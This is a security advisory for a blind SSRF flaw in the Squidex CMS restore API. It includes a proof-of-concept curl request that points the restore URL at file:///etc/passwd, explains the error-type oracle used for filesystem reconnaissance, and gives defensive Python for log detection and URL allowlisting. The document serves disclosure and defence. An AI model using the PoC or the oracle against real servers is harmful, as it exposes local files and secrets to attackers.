
Blind SSRF via file:// Protocol in Restore API leading to Local File Interaction

Moderate
SebastianStehle published GHSA-45fq-w37p-qfw5 Apr 14, 2026

Package

Squidex (NuGet)

Affected versions

<= 7.21.0

Patched versions

None

Description

Security Vulnerability Report: Blind SSRF in Restore API

Affected Component

Squidex API: Backup / Restore Engine (Endpoint: /api/apps/restore)

Summary

The Squidex Restore API is vulnerable to blind Server-Side Request Forgery (SSRF). The application does not validate the URI scheme of the user-supplied Url parameter, so a file:// URI is accepted in place of an http:// or https:// one. An authenticated administrator can therefore make the backend open arbitrary paths on the server's local filesystem (referred to in this report as Local File Interaction, LFI). The API response itself reveals nothing, but the error the background job records differs depending on whether the path existed and could be read, so the server's logs, or anything else that exposes the job's failure reason, act as a side channel that discloses information about the filesystem.

Details

  1. Configuration: An attacker creates a "Restore" job using a local filesystem URI (e.g., file:///etc/passwd).
  2. Trigger: The attacker submits the POST request to the restore endpoint.
  3. Execution: The backend accepts the request and passes the URL to a background worker (RestoreJob).
  4. Observation: While the API response is a generic 204 No Content, the internal server logs reveal that the server successfully opened and read the file before failing because the content was not a valid ZIP archive.

Proof of Concept (PoC)

1. Malicious Request

Run the following curl command (replace <TOKEN> with a valid admin token):

curl -X POST http://localhost/api/apps/restore/ \
  -H 'Authorization: Bearer <TOKEN>' \
  -H 'Content-Type: application/json' \
  -d '{
    "Url": "file:///etc/passwd",
    "Name": "exploit-poc"
  }' -v 

2. Validation via Logs

After execution, the following error in the Squidex container logs confirms the internal file interaction:

{
  "logLevel": "Error",
  "message": "Backup with job id 381bcfcb-3701-44d0-a8c8-ea43b3ec6271 from URL 'file:///etc/passwd' failed.",
  "exception": {
    "type": "System.IO.InvalidDataException",
    "message": "End of Central Directory record could not be found.",
    "stackTrace": "at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\n at System.IO.Compression.ZipArchive..ctor(Stream stream...)\n at Squidex.Domain.Apps.Entities.Backup.BackupReader..ctor(...) in BackupReader.cs:line 42\n at Squidex.Domain.Apps.Entities.Backup.TempFolderBackupArchiveLocation.OpenReaderAsync(...) in TempFolderBackupArchiveLocation.cs:line 57"
  }
} 

Note: ZipArchive raises InvalidDataException only after it has read the stream in search of the End of Central Directory record, so this exception confirms that the server opened /etc/passwd and read its bytes. A nonexistent or unreadable path fails earlier with a different exception (for example FileNotFoundException or UnauthorizedAccessException), and that difference is the oracle that makes this blind primitive useful for filesystem reconnaissance.
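
The log entry above is also what a defender can alert on. The following detection rule is an added example, not Squidex code: it scans JSON log lines shaped like the advisory's entry and reports every restore job whose URL did not use http or https, and it labels each hit by what the .NET exception type says about the path (read, absent, denied). The lines in SAMPLE_LOG are constructed for this example; the first mirrors the advisory's entry, the other two are invented to show a missing file and an ordinary https job.

```python
"""Detection rule for non-http(s) restore URLs in Squidex error logs.

Added example, not Squidex code. The log lines in SAMPLE_LOG are constructed.
"""
import json
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Captures the job id and URL from the failure message the background job logs.
MESSAGE_RE = re.compile(
    r"Backup with job id (?P<job>[0-9a-f-]{36}) from URL '(?P<url>[^']*)' failed\."
)

# Constructed sample: line 1 mirrors the advisory, lines 2-4 are invented.
SAMPLE_LOG = """\
{"logLevel": "Error", "message": "Backup with job id 381bcfcb-3701-44d0-a8c8-ea43b3ec6271 from URL 'file:///etc/passwd' failed.", "exception": {"type": "System.IO.InvalidDataException", "message": "End of Central Directory record could not be found."}}
{"logLevel": "Error", "message": "Backup with job id 7d9e2a44-5c31-4fd2-8c33-2e1b9c0d5f66 from URL 'file:///var/lib/squidex/backups/other-app.zip' failed.", "exception": {"type": "System.IO.FileNotFoundException", "message": "Could not find file."}}
{"logLevel": "Error", "message": "Backup with job id 0b6b7c5e-3a1d-4d6b-9b9f-1f4c2a8e9d10 from URL 'https://backups.example.com/app.zip' failed.", "exception": {"type": "System.Net.Http.HttpRequestException", "message": "No such host is known."}}
{"logLevel": "Information", "message": "Application started."}
"""


def classify_exception(exception_type):
    """Map the .NET exception type to what it tells us about the local path."""
    if exception_type == "System.IO.InvalidDataException":
        # ZipArchive consumed the bytes: the file exists and was readable.
        return "file read"
    if exception_type in ("System.IO.FileNotFoundException",
                          "System.IO.DirectoryNotFoundException"):
        return "file absent"
    if exception_type == "System.UnauthorizedAccessException":
        return "file denied"
    return "unknown"


def find_suspicious_restores(log_text):
    """Return (job_id, url, exception_type, verdict) for each non-http(s) restore URL."""
    findings = []
    for raw in log_text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        try:
            entry = json.loads(raw)
        except json.JSONDecodeError:
            continue  # unstructured line, nothing to match
        if not isinstance(entry, dict):
            continue
        match = MESSAGE_RE.search(entry.get("message", ""))
        if not match:
            continue
        url = match.group("url")
        if urlsplit(url).scheme in ALLOWED_SCHEMES:
            continue  # ordinary remote backup, not this issue
        exc_type = (entry.get("exception") or {}).get("type", "")
        findings.append((match.group("job"), url, exc_type, classify_exception(exc_type)))
    return findings


if __name__ == "__main__":
    for job, url, exc_type, verdict in find_suspicious_restores(SAMPLE_LOG):
        print(f"job {job}: {url} -> {exc_type} ({verdict})")
```

One caveat: this message is only emitted when the job fails. A file:// URI that points at a valid backup archive restores without error and produces no such line, so the URL should also be logged and checked at job creation, not only on failure.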

Impact

This vulnerability allows authenticated attackers to:

1. Filesystem Reconnaissance: Confirm the presence and readability of sensitive files (e.g., appsettings.json, secrets), because a file that exists and can be read fails as an invalid ZIP archive while a missing or inaccessible one fails earlier with a different error.

2. Information Disclosure: In multi-tenant environments, a file:// URI pointing at another tenant's backup archive on the same host is a valid ZIP archive, so it could be processed as a legitimate backup and its contents restored into the attacker's app.

Precedent & Related CVEs

- CVE-2024-52588: SSRF in CMS platforms allowing internal scanning via localhost/local files.

- CVE-2023-27156: Improper import URL validation leading to SSRF.

Remediation Recommendations

1. Protocol Whitelisting: Accept only http:// and https:// URIs. Parse the value as an absolute URI and compare the scheme rather than inspecting the raw string, and reject everything else, including file://.

2. Input Validation: Perform this check in the API handler at job creation, so that a rejected URI never reaches the background RestoreJob.

3. Safe IO Handling: Ensure that the component that opens the archive cannot be handed a local path derived from user-provided input, so that a future bypass of the scheme check still cannot touch the filesystem.

A scheme allowlist closes the file:// case only. An http:// URL can still point at localhost, a link-local metadata endpoint or the internal network, so the destination host should also be resolved and checked against internal address ranges before the fetch.
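
The following is an added example of the check described above, not code from the Squidex code base. It is written in Python so it can be run here; the C# restore handler would apply the same rules before the URL is handed to the background job. It goes one step beyond the advisory's list by also resolving the host and refusing non-public destinations, which is the part a scheme allowlist alone does not cover. The names validate_restore_url, is_safe_restore_url and the injectable `resolve` parameter are chosen for this example; the IP addresses in the comments and tests are constructed.

```python
"""Allowlist check for a user-supplied restore URL.

Added example, not Squidex code. Function names and the `resolve` hook are
assumptions of this example.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


class UnsafeRestoreUrl(ValueError):
    """The URL must not be fetched by the server."""


def _resolve(hostname):
    """Default resolver: every address the host name resolves to."""
    return [info[4][0] for info in socket.getaddrinfo(hostname, None)]


def validate_restore_url(url, resolve=_resolve):
    """Return the parsed URL if it is safe to fetch, else raise UnsafeRestoreUrl."""
    parts = urlsplit(url)
    # 1. Scheme allowlist. urlsplit lower-cases the scheme, so "FILE://" is
    #    caught too. This rule alone closes the file:// case in the advisory.
    if parts.scheme not in ALLOWED_SCHEMES:
        raise UnsafeRestoreUrl(f"scheme {parts.scheme or '<none>'!r} is not allowed")
    if not parts.hostname:
        raise UnsafeRestoreUrl("URL has no host")
    if parts.username is not None or parts.password is not None:
        raise UnsafeRestoreUrl("credentials in the URL are not allowed")
    # 2. Destination check. An http:// URL is still SSRF when it points at the
    #    server itself, a cloud metadata endpoint or the internal network, so
    #    resolve the host and refuse anything that is not globally routable.
    try:
        addresses = [ipaddress.ip_address(parts.hostname)]
    except ValueError:  # a host name rather than a literal address
        try:
            addresses = [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
        except OSError as exc:
            raise UnsafeRestoreUrl(f"cannot resolve {parts.hostname}: {exc}") from exc
    for addr in addresses:
        if not addr.is_global:
            raise UnsafeRestoreUrl(f"{parts.hostname} resolves to non-public address {addr}")
    return parts


def is_safe_restore_url(url, resolve=_resolve):
    """Boolean form of validate_restore_url for callers that only need a verdict."""
    try:
        validate_restore_url(url, resolve)
        return True
    except UnsafeRestoreUrl:
        return False


if __name__ == "__main__":
    # Constructed resolver so the demonstration runs offline.
    fake_dns = lambda host: {"backups.example.com": ["93.184.216.34"],
                             "internal.corp": ["10.0.0.5"]}[host]
    for candidate in ("https://backups.example.com/app.zip",
                      "file:///etc/passwd",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://internal.corp/app.zip"):
        print(candidate, "->", "allowed" if is_safe_restore_url(candidate, fake_dns) else "rejected")
```

Two points about the destination check. The address validated here must be the one the download actually connects to: either pin the connection to it or re-validate after every redirect, otherwise a redirect or a DNS answer that changes between check and fetch (rebinding) routes the request to an internal host anyway. And `is_global` is a broad filter; an environment with public-range addresses used internally needs an explicit denylist on top of it.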

Severity

Moderate

CVSS overall score


CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
Low

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:L

CVE ID

CVE-2026-41177

Weaknesses

External Control of File Name or Path

The product allows user input to control or influence paths or file names that are used in filesystem operations. Learn more on MITRE.

Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Learn more on MITRE.

Credits